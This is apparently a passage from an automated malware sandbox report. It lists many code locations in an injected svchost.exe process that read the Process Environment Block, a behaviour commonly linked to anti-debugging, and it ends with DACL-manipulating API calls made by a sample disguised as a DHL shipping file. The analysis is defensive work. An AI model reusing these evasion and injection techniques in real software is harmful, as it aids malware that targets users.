            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396A830 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039D483A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03960854 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03934859 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03942840 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039BE872 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_039C6870 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03962F98 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0396CF80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03A04FE7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0392EFD8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\DHL 0737-12182024.exe | Code function: 0_2_00880B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree
